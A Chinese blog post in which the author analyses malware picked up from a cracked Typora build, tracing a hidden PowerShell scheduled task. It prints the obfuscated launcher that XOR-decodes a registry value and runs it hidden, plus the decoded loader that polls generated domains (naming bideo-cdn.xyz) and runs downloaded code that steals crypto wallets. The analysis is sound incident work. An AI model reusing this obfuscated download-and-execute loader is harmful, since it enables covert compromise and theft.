没想到互联网老司机也有翻车的一天= =

前几天贪小便宜,发现typora的beta版本过期了,于是去一个平常十分信任的网站找了份破解版,然后就翻车了T T

起因是今天在编译东西的时候,管理观察任务管理器的时候发现多出一个powershell进程。因为平常不怎么用powershell,所以看到这进程还是十分敏感的,就右键看了一下等待链。结果不看不知道,一看吓一跳,分析结果说进程正在等待网络IO。当场就觉得不对劲了,用powershell执行本地程序还情有可原,这年头还会有哪家公司用powershell来做网络通信,大概率就是个人开发者了。

为了摸清楚这个powershell进程到底在干嘛,最为直观的信息就是它的调用链了。作为脚本语言,最大的好处就是其源代码往往具有一定可读性,对于伪装级别不高的脚本来说,摸到脚本本身大概就能知道它在干嘛了。

然而,切出任务管理器一看,命令行长这样:

PoWerShELl -wINDOWstYle hidDEN

一股浓浓的黑客风味扑面而来——虽然cmd和powershell允许大小写混用,但一般人为了可读性,哪会整得这样花里胡哨的?

伪装的还算好,脚本和参数可能通过管道传送,没有出现在命令行里,但这编程风格还是露出了鸡脚。怎么哪里都有小黑子(逃

接下来要做的就是顺藤摸瓜,找到究竟是谁调用的这个脚本,再把背后的真实脚本挖出来。这里用wmic命令来寻找应用的调用关系(https://stackoverflow.com/questions/7486717/finding-parent-process-id-on-windows):

wmic process where (processid=PROCID_HERE) get parentprocessid

凭着pid一路顺藤摸瓜,找到了svchost.exe,右键转到服务一看,发现是计划任务。

然后来到控制面板中的计划任务,选到左边导航栏最顶部的元素任务计划程序(本地),再从菜单栏里的操作选择显示所有正在运行的任务。不消多看,为数不多的运行中任务里,只有一个任务名是奇奇怪怪的字符串,对应的命令是一个光秃秃的cmd.exe

扒出来一看,完整的命令行长这样:

cmd.exe /C eCHo IeX "Icm ([SCRiPtbLoCk]::cREatE([sTriNg]::jOin('', ((geT-iTeMprOPeRTY -paTh 'HKlM:\SoftwaRe\KITwaREU5OEj').'u5oejUf' | % { [ChaR](`$_ -bXOr 236) }))))" | PoWerShELl -wINDOWstYle hidDEN

只能说味儿更浓了。

然后简单解释一下这串命令干了啥:从注册表取HKlM:\SoftwaRe\KITwaREU5OEj\u5oejUf项的值,逐字节与数236做异或操作(简单的字符串解码),然后做一个没什么鸟用的空字符串拼接,再包裹为一个可执行脚本块,然后使用icmInvoke-Command)、iexInvoke-Expression)命令让powershell执行这个代码段。最后为了隐藏这段代码,使用cmd的echo功能转化到管道输出,再通过管道拼接直接将脚本输入到新创建的powershell进程中;powershell进程再通过-WindowStyle hidden参数设置为无窗口后台运行。通过这个方式,完整地掩盖了要运行的真是脚本——我们到现在还不知道黑客打算执行什么。

在前面顺着pid找调用进程的时候,找到cmd.exe的时候是能看到这串命令的。因为恰好正在用cmake编译,当时还楞了一下,cmake原来还会调用powershell脚本的么= =

接下来就是解密真实脚本的过程了,大致工作就是从上面的cmd命令中,把到执行powershell脚本之前的一段截取出来,让他输出到命令行即可,在此就不展开讲了。(其中很怪的一点是,echo命令里用了`字符来保护$字符,但我印象中cmd的保护字符是^来着?)

结果在这里贴一下吧:

while ($true) {
  try {
        foreach ($c in (@("com", "xyz"))) {
            foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
                foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                    try {
                        $h = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
                        $r = Invoke-RestMethod -Uri "http://$a-$b.$c/v2/B723B9C0-2A79-4F4D-9F9D-4DED94453BFB?v=newcounter2" -TimeoutSec 30 -Headers @{ Host = $h }
                        if ($r -ne '') {
                            sTaRt-jOb ([sCriptBlock]::Create($r)) | Wait-Job -Timeout 7200
                            break;
                        }
                    }
                    catch {
                    }
                }
            }
        }
    }
    catch {
    }
    Start-Sleep -Seconds 5;
}

这脚本写的还挺鸡贼,powershell解码出来一行只有一个字符,光是整理成可读格式都花了我不小功夫。

在脚本里面,黑客又做了一个2x10x10=200个网站的排列组合,每5秒钟访问一个,其中藏了一个真实的网站,访问后可以得到一段脚本,作者让他等脚本执行2小时,然后重新开始这个循环。

下下来看了一下,tnnd,这鸟人在系统里搜索区块链钱包,然后上传个人信息给服务器,怕是偷钱去了。还好不玩区块链。

对了,域名是bideo-cdn.xyz,有兴趣的可以自己下来看看。

标签: none

添加新评论